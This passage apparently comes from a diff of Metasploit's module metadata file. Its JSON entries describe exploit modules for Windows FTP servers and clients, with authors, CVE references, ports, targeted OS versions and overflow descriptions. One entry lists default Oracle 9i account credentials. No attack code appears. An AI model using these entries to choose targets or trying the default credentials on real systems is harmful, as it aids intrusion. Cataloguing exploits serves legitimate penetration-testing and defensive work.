"autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2k Server SP4 English", - "Windows XP Pro SP2 Italian" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/filecopa_list_overflow.rb", - "is_install_path": true, - "ref_name": "windows/ftp/filecopa_list_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/filewrangler_list_reply": { - "name": "FileWrangler 5.30 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/filewrangler_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "nullthreat", - "corelanc0d3r " - ], - "description": "This module exploits a buffer overflow in the FileWrangler client\n that is triggered when the client connects to a FTP server and lists\n the directory contents, containing an overly long directory name.", - "references": [ - "OSVDB-94555", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/filewrangler_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/filewrangler_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/freefloatftp_user": { - "name": "Free Float FTP Server USER Command Buffer Overflow", - "fullname": "exploit/windows/ftp/freefloatftp_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-12", - "type": "exploit", - "author": [ - "D35m0nd142", - "Doug Prostko " - ], - "description": "Freefloat FTP Server is prone to an overflow condition. It\n fails to properly sanitize user-supplied input resulting in a\n stack-based buffer overflow. With a specially crafted 'USER'\n command, a remote attacker can potentially have an unspecified\n impact.", - "references": [ - "OSVDB-69621", - "EDB-23243" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "FreeFloat / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/freefloatftp_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/freefloatftp_user", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/freefloatftp_wbem": { - "name": "FreeFloat FTP Server Arbitrary File Upload", - "fullname": "exploit/windows/ftp/freefloatftp_wbem", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-12-07", - "type": "exploit", - "author": [ - "sinn3r ", - "juan vazquez " - ], - "description": "This module abuses multiple issues in FreeFloat: 1. No credential is actually\n needed to login; 2. User's default path is in C:\\, and this cannot be changed;\n 3. User can write to anywhere on the server's file system. As a result of these\n poor implementations, a malicious user can just log in and then upload files,\n and let WMI (Management Instrumentation service) to execute the payload uploaded.", - "references": [ - "OSVDB-88302", - "OSVDB-88303" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "FreeFloat" - ], - "mod_time": "2021-02-18 09:18:19 +0000", - "path": "/modules/exploits/windows/ftp/freefloatftp_wbem.rb", - "is_install_path": true, - "ref_name": "windows/ftp/freefloatftp_wbem", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/ftp/freeftpd_pass": { - "name": "freeFTPd PASS Command Buffer Overflow", - "fullname": "exploit/windows/ftp/freeftpd_pass", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-08-20", - "type": "exploit", - "author": [ - "Wireghoul", - "TecR0c " - ], - "description": "freeFTPd 1.0.10 and below contains an overflow condition that is triggered as\n user-supplied input is not properly validated when handling a specially crafted\n PASS command. This may allow a remote attacker to cause a buffer overflow,\n resulting in a denial of service or allow the execution of arbitrary code.\n\n freeFTPd must have an account set to authorization anonymous user account.", - "references": [ - "OSVDB-96517", - "EDB-27747", - "BID-61905" - ], - "platform": "Windows", - "arch": "x86", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "freeFTPd 1.0.10 and below on Windows Desktop Version" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/ftp/freeftpd_pass.rb", - "is_install_path": true, - "ref_name": "windows/ftp/freeftpd_pass", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/freeftpd_user": { - "name": "freeFTPd 1.0 Username Overflow", - "fullname": "exploit/windows/ftp/freeftpd_user", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-11-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the freeFTPd\n multi-protocol file transfer service. This flaw can only be\n exploited when logging has been enabled (non-default).", - "references": [ - "CVE-2005-3683", - "OSVDB-20909", - "BID-15457" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows 2000 English ALL", - "Windows XP Pro SP0/SP1 English", - "Windows NT SP5/SP6a English", - "Windows 2003 Server English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/freeftpd_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/freeftpd_user", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ftpgetter_pwd_reply": { - "name": "FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)", - "fullname": "exploit/windows/ftp/ftpgetter_pwd_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "ekse", - "corelanc0d3r " - ], - "description": "This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.\n When processing the response on a PWD command, a stack based buffer overflow occurs.\n This leads to arbitrary code execution when a structured exception handler gets\n overwritten.", - "references": [ - "OSVDB-68638", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP SP3 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ftpgetter_pwd_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ftppad_list_reply": { - "name": "FTPPad 1.2.0 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/ftppad_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "corelanc0d3r" - ], - "description": "This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is\n triggered when the client connects to a FTP server which sends an overly long directory\n and filename in response to a LIST command.\n\n This will cause an access violation, and will eventually overwrite the saved extended\n instruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n sniper was needed to make this one work.", - "references": [ - "OSVDB-68714", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP SP3 Professional, English - shlwapi 6.00.2900.5912", - "XP SP3 Professional, German - shlwapi 6.00.2900.5912", - "XP SP3 Professional, English - shlwapi 6.00.2900.5512" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ftppad_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ftppad_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ftpshell51_pwd_reply": { - "name": "FTPShell 5.1 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/ftpshell51_pwd_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n triggered when the ftp client tries to process an overly long response to a PWD\n command. This will overwrite the saved EIP and structured exception handler.", - "references": [ - "OSVDB-68639", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ftpshell51_pwd_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ftpshell_cli_bof": { - "name": "FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/ftpshell_cli_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-04", - "type": "exploit", - "author": [ - "r4wd3r", - "Daniel Teixeira" - ], - "description": "This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise\n edition) allowing remote code execution.", - "references": [ - "CVE-2018-7573", - "EDB-44596" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ftpshell_cli_bof.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ftpshell_cli_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ftpsynch_list_reply": { - "name": "FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/ftpsynch_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "myne-us", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n version 4.0.73.274 The overflow gets triggered by sending an overly long filename to\n the client in response to a LIST command.\n The LIST command gets issued when doing a preview or when you have just created a new\n sync profile and allow the tool to see the differences.\n This will overwrite a structured exception handler and trigger an access violation.", - "references": [ - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ftpsynch_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ftpsynch_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/gekkomgr_list_reply": { - "name": "Gekko Manager FTP Client Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/gekkomgr_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "nullthreat", - "corelanc0d3r " - ], - "description": "This module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n processing the response received after sending a LIST request. If this response contains\n a long filename, a buffer overflow occurs, overwriting a structured exception handler.", - "references": [ - "OSVDB-68641", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP SP3 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/gekkomgr_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/gekkomgr_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/globalscapeftp_input": { - "name": "GlobalSCAPE Secure FTP Server Input Overflow", - "fullname": "exploit/windows/ftp/globalscapeftp_input", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-05-01", - "type": "exploit", - "author": [ - "Fairuzan Roslan ", - "Mati Aharoni " - ], - "description": "This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.\n All versions prior to 3.0.3 are affected by this flaw. A valid user account (\n or anonymous access) is required for this exploit to work.", - "references": [ - "CVE-2005-1415", - "OSVDB-16049", - "BID-13454", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "GlobalSCAPE Secure FTP Server <= 3.0.2 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/globalscapeftp_input.rb", - "is_install_path": true, - "ref_name": "windows/ftp/globalscapeftp_input", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/goldenftp_pass_bof": { - "name": "GoldenFTP PASS Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/goldenftp_pass_bof", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-01-23", - "type": "exploit", - "author": [ - "Craig Freyman", - "bannedit ", - "Joff Thyer " - ], - "description": "This module exploits a vulnerability in the Golden FTP service, using the PASS\n command to cause a buffer overflow. Please note that in order trigger the vulnerable\n code, the victim machine must have the \"Show new connections\" setting enabled. By\n default, this option is unchecked.", - "references": [ - "CVE-2006-6576", - "OSVDB-35951", - "BID-45957", - "EDB-16036" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows XP Pro SP3", - "Windows XP Pro SP2", - "Windows XP Pro SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/goldenftp_pass_bof.rb", - "is_install_path": true, - "ref_name": "windows/ftp/goldenftp_pass_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/httpdx_tolog_format": { - "name": "HTTPDX tolog() Function Format String Vulnerability", - "fullname": "exploit/windows/ftp/httpdx_tolog_format", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-11-17", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a format string vulnerability in HTTPDX FTP server.\n By sending a specially crafted FTP command containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.", - "references": [ - "CVE-2009-4769", - "OSVDB-60181" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic Targeting", - "httpdx 1.4 - Windows XP SP3 English", - "httpdx 1.4.5 - Windows XP SP3 English", - "httpdx 1.4.6 - Windows XP SP3 English", - "httpdx 1.4.6b - Windows XP SP3 English", - "httpdx 1.5 - Windows XP SP3 English" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/ftp/httpdx_tolog_format.rb", - "is_install_path": true, - "ref_name": "windows/ftp/httpdx_tolog_format", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/kmftp_utility_cwd": { - "name": "Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow", - "fullname": "exploit/windows/ftp/kmftp_utility_cwd", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-08-23", - "type": "exploit", - "author": [ - "Shankar Damodaran", - "Muhamad Fadzil Ramli " - ], - "description": "This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.\n Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which\n leads to an SEH overflow. Konica FTP allows anonymous access by default; valid\n credentials are typically unnecessary to exploit this vulnerability.", - "references": [ - "CVE-2015-7768", - "EDB-37908" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 7 SP1 x86" - ], - "mod_time": "2023-03-22 12:52:15 +0000", - "path": "/modules/exploits/windows/ftp/kmftp_utility_cwd.rb", - "is_install_path": true, - "ref_name": "windows/ftp/kmftp_utility_cwd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/labf_nfsaxe": { - "name": "LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/labf_nfsaxe", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-05-15", - "type": "exploit", - "author": [ - "Tulpa", - "Daniel Teixeira" - ], - "description": "This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote\n code execution.", - "references": [ - "CVE-2017-18047", - "EDB-42011" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/labf_nfsaxe.rb", - "is_install_path": true, - "ref_name": "windows/ftp/labf_nfsaxe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/leapftp_list_reply": { - "name": "LeapFTP 3.0.1 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/leapftp_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "corelanc0d3r ", - "nullthreat" - ], - "description": "This module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n This issue is triggered when a file with a long name is downloaded/opened.", - "references": [ - "OSVDB-68640", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/leapftp_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/leapftp_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/leapftp_pasv_reply": { - "name": "LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow", - "fullname": "exploit/windows/ftp/leapftp_pasv_reply", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-06-09", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600\n client that is triggered through an excessively long PASV reply command. This\n module was ported from the original exploit by drG4njubas with minor improvements.", - "references": [ - "CVE-2003-0558", - "OSVDB-4587", - "BID-7860", - "EDB-54" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal LeapFTP.exe", - "Windows 2000 SP0/4 English", - "Windows XP SP0 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/leapftp_pasv_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/leapftp_pasv_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ms09_053_ftpd_nlst": { - "name": "MS09-053 Microsoft IIS FTP Server NLST Response Overflow", - "fullname": "exploit/windows/ftp/ms09_053_ftpd_nlst", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-08-31", - "type": "exploit", - "author": [ - "Kingcope ", - "hdm " - ], - "description": "This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP\n service. The flaw is triggered when a special NLST argument is passed\n while the session has changed into a long directory path. For this exploit\n to work, the FTP server must be configured to allow write access to the\n file system (either anonymously or in conjunction with a real account)", - "references": [ - "EDB-9541", - "CVE-2009-3023", - "OSVDB-57589", - "BID-36189", - "MSB-MS09-053" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 SP4 English/Italian (IIS 5.0)", - "Windows 2000 SP3 English (IIS 5.0)", - "Windows 2000 SP0-SP3 Japanese (IIS 5.0)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ms09_053_ftpd_nlst", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/netterm_netftpd_user": { - "name": "NetTerm NetFTPD USER Buffer Overflow", - "fullname": "exploit/windows/ftp/netterm_netftpd_user", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-04-26", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a vulnerability in the NetTerm NetFTPD\n application. This package is part of the NetTerm package.\n This module uses the USER command to trigger the overflow.", - "references": [ - "CVE-2005-1323", - "OSVDB-15865", - "URL-https://seclists.org/lists/fulldisclosure/2005/Apr/0578.html", - "BID-13396" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "NetTerm NetFTPD Universal", - "Windows 2000 English", - "Windows XP English SP0/SP1", - "Windows 2003 English", - "Windows NT 4.0 SP4/SP5/SP6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/netterm_netftpd_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/netterm_netftpd_user", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/odin_list_reply": { - "name": "Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)", - "fullname": "exploit/windows/ftp/odin_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "rick2600", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n triggered when processing the response on a LIST command. During the overflow,\n a structured exception handler record gets overwritten.", - "references": [ - "OSVDB-68824", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP SP3 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/odin_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/odin_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/open_ftpd_wbem": { - "name": "Open-FTPD 1.2 Arbitrary File Upload", - "fullname": "exploit/windows/ftp/open_ftpd_wbem", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-18", - "type": "exploit", - "author": [ - "Serge Gorbunov", - "bcoles " - ], - "description": "This module exploits multiple vulnerabilities found in Open&Compact FTP\n server. The software contains an authentication bypass vulnerability and a\n arbitrary file upload vulnerability that allows a remote attacker to write\n arbitrary files to the file system as long as there is at least one user\n who has permission.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.", - "references": [ - "OSVDB-65687", - "EDB-13932", - "CVE-2010-2620" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Open&Compact FTP 1.2 on Windows (Before Vista)" - ], - "mod_time": "2021-02-18 09:18:19 +0000", - "path": "/modules/exploits/windows/ftp/open_ftpd_wbem.rb", - "is_install_path": true, - "ref_name": "windows/ftp/open_ftpd_wbem", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/ftp/oracle9i_xdb_ftp_pass": { - "name": "Oracle 9i XDB FTP PASS Overflow (win32)", - "fullname": "exploit/windows/ftp/oracle9i_xdb_ftp_pass", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-08-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "By passing an overly long string to the PASS command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference.", - "references": [ - "CVE-2003-0727", - "OSVDB-2449", - "BID-8375", - "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 2100, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Oracle 9.2.0.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb", - "is_install_path": true, - "ref_name": "windows/ftp/oracle9i_xdb_ftp_pass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/oracle9i_xdb_ftp_unlock": { - "name": "Oracle 9i XDB FTP UNLOCK Overflow (win32)", - "fullname": "exploit/windows/ftp/oracle9i_xdb_ftp_unlock", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-08-18", - "type": "exploit", - "author": [ - "MC ", - "David Litchfield " - ], - "description": "By passing an overly long token to the UNLOCK command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference. Oracle9i includes a number of default accounts,\n including dbsnmp:dbsmp, scott:tiger, system:manager, and\n sys:change_on_install.", - "references": [ - "CVE-2003-0727", - "OSVDB-2449", - "BID-8375", - "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 2100, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Oracle 9.2.0.1 Universal" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb", - "is_install_path": true, - "ref_name": "windows/ftp/oracle9i_xdb_ftp_unlock", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/pcman_put": { - "name": "PCMAN FTP Server Buffer Overflow - PUT Command", - "fullname": "exploit/windows/ftp/pcman_put", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-08-07", - "type": "exploit", - "author": [ - "Jay Turla", - "Chris Higgins" - ], - "description": "This module exploits a buffer overflow vulnerability found in the PUT command of the\n PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous\n credentials are enabled.", - "references": [ - "CVE-2013-4730", - "EDB-37731", - "OSVDB-94624" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/pcman_put.rb", - "is_install_path": true, - "ref_name": "windows/ftp/pcman_put", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/pcman_stor": { - "name": "PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/pcman_stor", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-27", - "type": "exploit", - "author": [ - "Christian (Polunchis) Ramirez", - "Rick (nanotechz9l) Flores" - ], - "description": "This module exploits a buffer overflow vulnerability found in the STOR command of the\n PCMAN FTP v2.07 Server when the \"/../\" parameters are also sent to the server. Please\n note authentication is required in order to trigger the vulnerability. The overflowing\n string will also be seen on the FTP server log console.", - "references": [ - "CVE-2013-4730", - "OSVDB-94624", - "EDB-27703" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/pcman_stor.rb", - "is_install_path": true, - "ref_name": "windows/ftp/pcman_stor", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/proftp_banner": { - "name": "ProFTP 2.9 Banner Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/proftp_banner", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-08-25", - "type": "exploit", - "author": [ - "His0k4 " - ], - "description": 